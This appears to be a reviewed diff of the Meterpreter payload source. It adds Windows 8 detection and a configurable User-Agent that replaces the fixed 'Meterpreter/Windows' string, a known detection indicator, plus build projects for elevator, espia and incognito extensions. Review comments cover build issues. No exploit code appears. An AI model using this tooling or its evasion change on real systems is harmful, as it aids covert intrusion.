@@ -377,6 +377,13 @@ DWORD request_sys_config_sysinfo(Remote *remote, Packet *packet)
else
osName = "Windows 2008 R2";
}
+ else if (v.dwMajorVersion == 6 && v.dwMinorVersion == 2)
+ {
+ if (v.wProductType == VER_NT_WORKSTATION)
+ osName = "Windows 8";
+ else
+ osName = "Windows 2012";
+ }
if (!osName)
osName = "Unknown";
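Review bot: The new 6.2 branch will also label later Windows releases as "Windows 8" or "Windows 2012" if `v` is filled by GetVersionEx, because that API reports 6.2 on newer systems to processes that carry no matching compatibility manifest. Where `v` comes from is outside this hunk, so this needs confirming against the top of request_sys_config_sysinfo. If it holds, add `// 6.2 is also what GetVersionEx reports on later releases when the process has no manifest` above the branch so the reported name is not read as exact.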
diff --git a/external/source/meterpreter/source/server/metsrv.h b/external/source/meterpreter/source/server/metsrv.h
index ca5a65e49a..52044dec74 100644
--- a/external/source/meterpreter/source/server/metsrv.h
+++ b/external/source/meterpreter/source/server/metsrv.h
@@ -12,6 +12,9 @@
#ifdef _WIN32
+
+#define _WIN32_WINNT 0x0500
+
#define USE_DLL
#endif
#define METERPRETER_EXPORTS
diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c
index c0e2c4b4a1..850e22db1f 100644
--- a/external/source/meterpreter/source/server/server_setup.c
+++ b/external/source/meterpreter/source/server/server_setup.c
@@ -4,6 +4,7 @@
char * global_meterpreter_transport = "METERPRETER_TRANSPORT_SSL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char * global_meterpreter_url = "https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/\x00";
+char * global_meterpreter_ua = "METERPRETER_UA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int global_expiration_timeout = 0xb64be661;
int global_comm_timeout = 0xaf79257f;
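Review bot: `global_meterpreter_ua` is added without a comment saying what it is. Judging by the neighbouring transport and URL globals it is a fixed-size, NUL-padded placeholder meant to be overwritten in the built binary, but nothing on the declaration states the slot size or that the replacement must stay NUL-terminated. If the placeholder is never replaced, the `InternetOpen` call changed in the next hunk sends the literal `METERPRETER_UA` as the User-Agent. A comment such as `// placeholder slot, patched before use; value must fit and stay NUL-terminated` would record that. For anyone maintaining detections, the fixed string `Meterpreter/Windows` removed in that hunk is no longer a reliable indicator after this change.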
@@ -401,7 +402,7 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
remote->comm_last_packet = current_unix_timestamp();
// Allocate the top-level handle
- remote->hInternet = InternetOpen("Meterpreter/Windows", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
+ remote->hInternet = InternetOpen(global_meterpreter_ua, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (!remote->hInternet) {
dprintf("[DISPATCH] Failed InternetOpen: %d", GetLastError());
return 0;
diff --git a/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj b/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj
new file mode 100644
index 0000000000..1f727f1924
--- /dev/null
+++ b/external/source/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj
@@ -0,0 +1,189 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {72F0246A-A38D-4547-9057-46020E8E503D}
+ ReflectiveDLLInjection
+ Win32Proj
+
+
+
+ StaticLibrary
+ Unicode
+ false
+
+
+ StaticLibrary
+ Unicode
+
+
+ StaticLibrary
+ MultiByte
+ true
+
+
+ StaticLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ libcmtd;%(IgnoreSpecificDefaultLibraries)
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN64;_DEBUG;_LIB;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ libcmtd;%(IgnoreSpecificDefaultLibraries)
+
+
+
+
+ Disabled
+ false
+ false
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+
+
+ Level4
+ ProgramDatabase
+ CompileAsC
+ Default
+ Size
+ false
+
+
+ .\Release/ReflectiveDllInjection.lib
+ backcompat.lib
+ ..\backcompat\Release\
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ false
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN64;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ true
+
+
+ Level3
+ ProgramDatabase
+ CompileAsC
+
+
+ .\Release/ReflectiveDllInjection.lib
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj
new file mode 100644
index 0000000000..2b94a53580
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj
@@ -0,0 +1,101 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}
+ Win32Proj
+ backcompat
+
+
+
+ StaticLibrary
+ true
+ Unicode
+
+
+ StaticLibrary
+ false
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+ AllRules.ruleset
+
+
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
+
+
+ Windows
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ false
+ true
+ WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+
+
+ Windows
+ true
+ true
+ true
+
+
+ true
+
+
+ Windows
+
+
+ 5.0
+
+
+ false
+ .\Release\backcompat.lib
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters
new file mode 100644
index 0000000000..831ce52c90
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Source Files
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user
new file mode 100644
index 0000000000..ace9a86acb
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/common/common.vcxproj b/external/source/meterpreter/workspace/common/common.vcxproj
new file mode 100644
index 0000000000..36c7b2be81
--- /dev/null
+++ b/external/source/meterpreter/workspace/common/common.vcxproj
@@ -0,0 +1,326 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
+ common
+
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ .\Release\
+ .\Release\
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ _DEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ common.h
+ .\Debug/common.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Debug\common.lib
+ true
+
+
+ true
+ .\Debug/common.bsc
+
+
+
+
+ X64
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ _DEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ common.h
+ .\Debug/common.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Debug\common.lib
+ true
+
+
+ true
+ .\Debug/common.bsc
+
+
+
+
+ MinSpace
+ Default
+ Size
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ common.h
+ .\Release/common.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Release\common.lib
+ true
+ Windows
+ 5.0
+
+
+ true
+ .\Release/common.bsc
+
+
+
+
+ X64
+
+
+ MinSpace
+ Default
+ Size
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Use
+ common.h
+ .\Release/common.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Release\common.lib
+ true
+
+
+ true
+ .\Release/common.bsc
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/elevator/elevator.vcxproj b/external/source/meterpreter/workspace/elevator/elevator.vcxproj
new file mode 100644
index 0000000000..e968fac448
--- /dev/null
+++ b/external/source/meterpreter/workspace/elevator/elevator.vcxproj
@@ -0,0 +1,232 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {662AFBB3-F64A-4AD1-8956-B9F1B846231C}
+ elevator
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ true
+
+
+ Application
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ true
+
+
+ Application
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ true
+ Console
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ true
+ Console
+ MachineX64
+
+
+
+
+ MaxSpeed
+ true
+ WIN32;NDEBUG;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+ false
+
+
+ Level3
+ ProgramDatabase
+ StdCall
+ CompileAsC
+ false
+ false
+
+
+ .\Release\elevator.dll
+ elevator.def
+ %(DelayLoadDLLs)
+ false
+ Windows
+ true
+ true
+
+
+ false
+ false
+ MachineX86
+ 5.0
+ backcompat.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ ..\backcompat\Release;
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(ProjectDir)\release\elevator.dll"
+copy /y "$(ProjectDir)\release\elevator.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ WIN32;NDEBUG;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+ false
+
+
+ Level3
+ ProgramDatabase
+ StdCall
+ CompileAsC
+
+
+ .\Release\elevator.x64.dll
+
+
+ %(DelayLoadDLLs)
+ false
+ Windows
+ true
+ true
+
+
+ false
+ false
+ MachineX64
+
+
+ copy /y "$(ProjectDir)\release\elevator.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj b/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj
new file mode 100644
index 0000000000..8095089d8d
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj
@@ -0,0 +1,238 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {488BE203-8407-42D1-B334-8B5C3BC5AB3E}
+ ext_server_boiler
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ ..\metsrv\Release;%(AdditionalLibraryDirectories)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MaxSpeed
+ true
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_boiler.dll
+ ..\backcompat\Release;..\metsrv\Release; ;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_boiler.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_boiler.lib
+ MachineX86
+ 5.0
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ ..\metsrv\Release;%(AdditionalLibraryDirectories)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_boiler.dll
+ ..\metsrv\Release; ;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_boiler.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_boiler.lib
+ MachineX64
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
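Review bot: Both Release blocks appear to link to the same file, `.\Release/ext_server_boiler.dll`, so whichever platform is built last overwrites the other and the DLL's architecture cannot be told from its name. The sibling extension projects in this commit name the x64 artifact with an `.x64.dll` suffix; the x64 value here would then read `.\Release\ext_server_boiler.x64.dll`. Element names are not visible in this rendering, so I am assuming these two values are the linker output file. Neither Release block has the post-build `copy /y` to `..\..\output\` that the other extensions use; if that is deliberate for a template project, a short XML comment saying so would help.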
diff --git a/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
new file mode 100644
index 0000000000..9569859ea7
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
@@ -0,0 +1,266 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}
+ ext_server_espia
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;jpeg.lib;%(AdditionalDependencies)
+ .\Release/ext_server_espia.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+ false
+ %(IgnoreSpecificDefaultLibraries)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_espia.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_espia.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_espia.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;jpeg.lib;%(AdditionalDependencies)
+ .\Release\ext_server_espia.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_espia.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_espia.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_espia.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
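Review bot: The x64 Release block reuses the Win32 block's `.\Release/` object directory and writes `.\Release/ext_server_espia.map` and `.\Release/ext_server_espia.lib` to the same paths as Win32, although the project-level directories for x64 are `$(Platform)\$(Configuration)\`. Switching platforms without a clean rebuild then leaves objects and an import library of the other architecture in place. Writing these as `$(IntDir)`-relative paths in the x64 block would keep the two builds apart. The same pattern is in the ext_server_incognito and ext_server_lanattacks projects that follow. Element names are stripped in this view, so the mapping of values to properties is inferred.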
diff --git a/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj
new file mode 100644
index 0000000000..ce301dec39
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj
@@ -0,0 +1,253 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {C427F6B9-C287-4BDA-A5BB-401FC19E207C}
+ ext_server_incognito
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
